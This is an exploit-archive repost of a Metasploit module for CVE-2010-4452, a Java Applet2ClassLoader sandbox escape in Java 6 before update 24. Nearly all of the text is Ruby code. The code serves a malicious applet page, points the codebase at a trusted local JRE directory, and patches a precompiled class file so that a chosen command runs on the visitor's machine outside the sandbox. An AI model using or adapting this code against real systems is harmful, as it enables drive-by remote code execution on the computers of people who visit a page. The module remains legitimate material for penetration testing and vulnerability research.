ExploitFixes
Sun Java Applet2ClassLoader Remote Code Execution Exploit - [CVE: 2010-4452] 2011-03-17 09:15:32

##
# $Id: java_codebase_trust.rb 11983 2011-03-16 05:01:29Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize( info = {} )
super( update_info( info,
'Name' => 'Sun Java Applet2ClassLoader Remote Code Execution Exploit',
'Description' => %q{
This module exploits a vulnerability in Java Runtime Environment
that allows an attacker to escape the Java Sandbox. By supplying a
codebase that points at a trusted directory and a code that is a URL that
does not contain an dots an applet can run without the sandbox.

The vulnerability affects version 6 prior to update 24.
},
'License' => MSF_LICENSE,
'Author' => [
'Frederic Hoguin', # Discovery, PoC
'jduck' # Metasploit module
],
'Version' => '$Revision: 11983 $',
'References' =>
[
[ 'CVE', '2010-4452' ],
# [ 'OSVDB', '' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-084/' ],
[ 'URL', 'http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html' ]
],
'Platform' => [ 'java', 'win' ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
# OK on Windows x86 + IE + Sun Java 1.6.0u21,u22,u23
# FAIL on Ubuntu x86 + Firefox + Sun Java 1.6.0u23
[ 'Automatic (no payload)', { } ]
=begin
[ 'Windows x86',
{
'Arch' => ARCH_X86,
'Platform' => 'win',
}
],
[ 'Generic (Java Payload)',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java',
}
],
=end
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 15 2011'
))

register_options(
[
OptString.new('CMD', [ false, "Command to run.", "calc.exe"]),
OptString.new('LIBPATH', [ false, "The codebase path to use (privileged)",
"C:\\Program Files\\java\\jre6\\lib\\ext"]),
], self.class)
end

def exploit
path = [ Msf::Config.data_directory, "exploits", "cve-2010-4452", "AppletX.class" ].join(::File::SEPARATOR)
@java_class = nil
File.open(path, "rb") { |fd|
@java_class = fd.read(fd.stat.size)
}
if not @java_class
raise RuntimeError, "Unable to load java class"
end

super
end

def on_request_uri(cli, request)
#print_status("Received request: #{request.uri}")

jpath = get_uri(cli)
#print_status(jpath)

# Do what get_uri does so that we can replace it in the string
host = Rex::Socket.source_address(cli.peerhost)
host_num = Rex::Socket.addr_aton(host).unpack('N').first

codebase = "file:" + datastore['LIBPATH']
code_url = jpath.sub(host, host_num.to_s)

cmd = datastore['CMD']
cmd_off = 0xb4

cn_off = 0xfc

case request.uri

when /\.class$/
#p = regenerate_payload(cli)

print_status("Sending class file to #{cli.peerhost}:#{cli.peerport}...")

cls = @java_class.dup
cls[cmd_off,2] = [cmd.length].pack('n')
cls[cmd_off+2,8] = cmd

cn_off += (cmd.length - 8) # the original length was 8 (calc.exe)
cls[cn_off,2] = [code_url.length].pack('n')
cls[cn_off+2,7] = code_url

#File.open('ughz.class', 'wb') { |fd| fd.write cls }

send_response(cli, cls, { 'Content-Type' => "application/octet-stream" })
handler(cli)

else
html = <<-EOS
<html>
<body>
<applet codebase="#{codebase}" code="#{code_url}" />
</body>
</html>
EOS
print_status("Sending HTML file to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, html)
handler(cli)
end

end

end